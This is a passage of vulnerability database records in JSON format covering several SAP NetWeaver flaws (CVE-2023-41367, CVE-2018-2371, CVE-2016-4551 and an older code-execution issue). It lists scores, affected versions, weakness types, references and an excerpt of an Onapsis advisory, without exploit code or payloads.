"url": "https://www.cnvd.org.cn/patchinfo/show/3548"
},
{
"title": "Patch for SAP NetWeaver arbitrary code execution vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/3547"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-1467"
},
{
"db": "CNVD",
"id": "CNVD-2011-1468"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "http://dsecrg.com/pages/vul/show.php?id=315http"
},
{
"trust": 0.6,
"url": "http://secunia.com/advisories/44187/http"
},
{
"trust": 0.4,
"url": "http://dsecrg.com/pages/vul/show.php?id=315"
},
{
"trust": 0.4,
"url": "http://dsecrg.com/pages/vul/show.php?id=316"
},
{
"trust": 0.3,
"url": "http://www.sap.com/platform/netweaver/index.epx"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/44187/"
},
{
"trust": 0.1,
"url": "https://service.sap.com/sap/support/notes/1490335"
},
{
"trust": 0.1,
"url": "http://secunia.com/products/corporate/evm/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/44187/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/blog/210"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "https://service.sap.com/sap/support/notes/1443367"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=44187"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-1467"
},
{
"db": "CNVD",
"id": "CNVD-2011-1468"
},
{
"db": "BID",
"id": "47360"
},
{
"db": "PACKETSTORM",
"id": "100438"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "5fc42b3e-1f98-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "618c24f8-1f98-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-1467"
},
{
"db": "CNVD",
"id": "CNVD-2011-1468"
},
{
"db": "BID",
"id": "47360"
},
{
"db": "PACKETSTORM",
"id": "100438"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-04-15T00:00:00",
"db": "IVD",
"id": "5fc42b3e-1f98-11e6-abef-000c29c66e3d"
},
{
"date": "2011-04-15T00:00:00",
"db": "IVD",
"id": "618c24f8-1f98-11e6-abef-000c29c66e3d"
},
{
"date": "2011-04-15T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-1467"
},
{
"date": "2011-04-15T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-1468"
},
{
"date": "2011-04-14T00:00:00",
"db": "BID",
"id": "47360"
},
{
"date": "2011-04-15T05:55:47",
"db": "PACKETSTORM",
"id": "100438"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-04-15T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-1467"
},
{
"date": "2011-04-15T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-1468"
},
{
"date": "2011-04-14T00:00:00",
"db": "BID",
"id": "47360"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "47360"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Arbitrary code execution vulnerability",
"sources": [
{
"db": "IVD",
"id": "5fc42b3e-1f98-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-1468"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input Validation Error",
"sources": [
{
"db": "BID",
"id": "47360"
}
],
"trust": 0.3
}
}
var-202309-1960
Vulnerability from variot
Due to missing authentication check in webdynpro application, an unauthorized user in SAP NetWeaver (Guided Procedures) - version 7.50, can gain access to admin view of specific function anonymously. On successful exploitation of vulnerability under specific circumstances, attacker can view user’s email address. There is no integrity/availability impact.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202309-1960",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.50"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-41367"
}
]
},
"cve": "CVE-2023-41367",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2023-41367",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "cna@sap.com",
"id": "CVE-2023-41367",
"trust": 1.0,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-41367"
},
{
"db": "NVD",
"id": "CVE-2023-41367"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Due to missing authentication check in webdynpro application, an unauthorized user in SAP NetWeaver (Guided Procedures) - version 7.50, can gain access to admin view of specific function anonymously. On successful exploitation of vulnerability under specific circumstances, attacker can view user\u2019s email address. There is no integrity/availability impact.\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-41367"
}
],
"trust": 1.0
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-41367",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-41367"
}
]
},
"id": "VAR-202309-1960",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:16:29.124000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-306",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-41367"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.0,
"url": "https://me.sap.com/notes/3348142"
},
{
"trust": 1.0,
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-41367"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-41367"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-09-12T02:15:12.733000",
"db": "NVD",
"id": "CVE-2023-41367"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-09-13T15:02:11.297000",
"db": "NVD",
"id": "CVE-2023-41367"
}
]
}
}
var-201802-0846
Vulnerability from variot
The SAML 2.0 service provider of SAP Netweaver AS Java Web Application, 7.50, does not sufficiently encode user controlled inputs, which results in Cross-Site Scripting (XSS) vulnerability. Remote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201802-0846",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver java web application",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.50"
},
{
"model": "netweaver application server java",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "web application 7.50"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.50"
}
],
"sources": [
{
"db": "BID",
"id": "103005"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002273"
},
{
"db": "NVD",
"id": "CVE-2018-2371"
},
{
"db": "CNNVD",
"id": "CNNVD-201802-944"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_java_web_application:7.50:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-2371"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "103005"
}
],
"trust": 0.3
},
"cve": "CVE-2018-2371",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2018-2371",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2018-2371",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-2371",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201802-944",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-002273"
},
{
"db": "NVD",
"id": "CVE-2018-2371"
},
{
"db": "CNNVD",
"id": "CNNVD-201802-944"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The SAML 2.0 service provider of SAP Netweaver AS Java Web Application, 7.50, does not sufficiently encode user controlled inputs, which results in Cross-Site Scripting (XSS) vulnerability. \nRemote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-2371"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002273"
},
{
"db": "BID",
"id": "103005"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-2371",
"trust": 2.7
},
{
"db": "BID",
"id": "103005",
"trust": 2.7
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002273",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201802-944",
"trust": 0.6
}
],
"sources": [
{
"db": "BID",
"id": "103005"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002273"
},
{
"db": "NVD",
"id": "CVE-2018-2371"
},
{
"db": "CNNVD",
"id": "CNNVD-201802-944"
}
]
},
"id": "VAR-201802-0846",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:13:58.248000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "February 2018 (2560741)",
"trust": 0.8,
"url": "https://blogs.sap.com/2018/02/13/sap-security-patch-day-february-2018/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-002273"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-002273"
},
{
"db": "NVD",
"id": "CVE-2018-2371"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "http://www.securityfocus.com/bid/103005"
},
{
"trust": 1.9,
"url": "https://launchpad.support.sap.com/#/notes/2560741"
},
{
"trust": 1.9,
"url": "https://blogs.sap.com/2018/02/13/sap-security-patch-day-february-2018/"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-2371"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-2371"
},
{
"trust": 0.3,
"url": "http://www.sap.com"
}
],
"sources": [
{
"db": "BID",
"id": "103005"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002273"
},
{
"db": "NVD",
"id": "CVE-2018-2371"
},
{
"db": "CNNVD",
"id": "CNNVD-201802-944"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "103005"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002273"
},
{
"db": "NVD",
"id": "CVE-2018-2371"
},
{
"db": "CNNVD",
"id": "CNNVD-201802-944"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-02-13T00:00:00",
"db": "BID",
"id": "103005"
},
{
"date": "2018-04-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-002273"
},
{
"date": "2018-02-14T12:29:00.390000",
"db": "NVD",
"id": "CVE-2018-2371"
},
{
"date": "2018-02-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201802-944"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-02-13T00:00:00",
"db": "BID",
"id": "103005"
},
{
"date": "2018-04-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-002273"
},
{
"date": "2018-03-15T18:34:48.547000",
"db": "NVD",
"id": "CVE-2018-2371"
},
{
"date": "2018-04-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201802-944"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201802-944"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Netweaver AS Java Web Application Vulnerable to cross-site scripting",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-002273"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201802-944"
}
],
"trust": 0.6
}
}
var-201610-0311
Vulnerability from variot
The (1) SAP_BASIS and (2) SAP_ABA components 7.00 SP Level 0031 in SAP NetWeaver 2004s might allow remote attackers to spoof IP addresses written to the Security Audit Log via vectors related to the network landscape, aka SAP Security Note 2190621. Vendors have confirmed this vulnerability SAP Security Note 2190621 It is released as. Supplementary information : CWE Vulnerability type by CWE-284: Improper Access Control ( Inappropriate access control ) Has been identified. Attackers can exploit this issue to bypass security restrictions to perform unauthorized actions; this may aid in launching further attacks. Impact on Business ===================== By exploiting this vulnerability an attacker could tamper the audit logs, hiding his trails after an attack to a SAP system.
Risk Level: High
2. Advisory Information
- Public Release Date: 09/22/2016
- Last Revised: 09/22/2016
- Security Advisory ID: ONAPSIS-2016-036
- Onapsis SVS ID: ONAPSIS-00144
- CVE: CVE-2016-4551
- Researcher: Sergio Abraham
- Vendor Provided CVSS v2: 3.5 (AV:N/AC:M/Au:S/C:N/I:P/A:N)
- Onapsis CVSS v2: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
3. Vulnerability Information
- Vendor: SAP AG
- Affected Components: SAP NetWeaver 2004s SAP_BASIS 7.00 SP Level 0031 SAPKB70031 SAP_ABA 7.00 SP level 0031 SAPKA70031
- Vulnerability Class: Insufficient Logging (CWE-778)
- Remotely Exploitable: Yes
- Locally Exploitable: No
- Authentication Required: No
-
Original Advisory: https://www.onapsis.com/research/security-advisories/sap-security-audit-log-invalid-address-logging
7. Report Timeline
- 11/07/2014: Onapsis provides vulnerability information to SAP AG.
- 09/22/2016: Onapsis Releases Security Advisory.
About Onapsis Research Labs
Onapsis Research Labs provides the industry analysis of key security issues that impact business-critical systems and applications. Delivering frequent and timely security and compliance advisories with associated risk levels, Onapsis Research Labs combine in-depth knowledge and experience to deliver technical and business-context with sound security judgment to the broader information security community.
About Onapsis, Inc.
Onapsis provides the most comprehensive solutions for securing SAP and Oracle enterprise applications. As the leading experts in SAP and Oracle cyber-security, Onapsis enables security and audit teams to have visibility, confidence and control of advanced threats, cyber-risks and compliance gaps affecting their enterprise applications.
Headquartered in Boston, Onapsis serves over 180 Global 2000 customers, including 10 top retailers, 20 top energy firms and 20 top manufacturers. Onapsis solutions are also the de-facto standard for leading consulting and audit firms such as Accenture, IBM, Deloitte, E&Y, KPMG and PwC.
Onapsis solutions include the Onapsis Security Platform, which is the most widely-used SAP-certified cyber-security solution in the market. Unlike generic security products, Onapsis context-aware solutions deliver both preventative vulnerability and compliance controls, as well as real-time detection and incident response capabilities to reduce risks affecting critical business processes and data. Through open interfaces, the platform can be integrated with leading SIEM, GRC and network security products, seamlessly incorporating enterprise applications into existing vulnerability, risk and incident response management programs.
These solutions are powered by the Onapsis Research Labs which continuously provide leading intelligence on security threats affecting SAP and Oracle enterprise applications. Experts of the Onapsis Research Labs were the first to lecture on SAP cyber-attacks and have uncovered and helped fix hundreds of security vulnerabilities to-date affecting SAP Business Suite, SAP HANA, SAP Cloud and SAP Mobile applications, as well as Oracle JD Edwards and Oracle E-Business Suite platforms.
For more information, please visit www.onapsis.com, or connect with us on Twitter, Google+, or LinkedIn.
-- This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. If you are not the intended recipient you are notified that disclosing, copying, distributing or taking any action in reliance on the contents of this information is strictly prohibited
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201610-0311",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
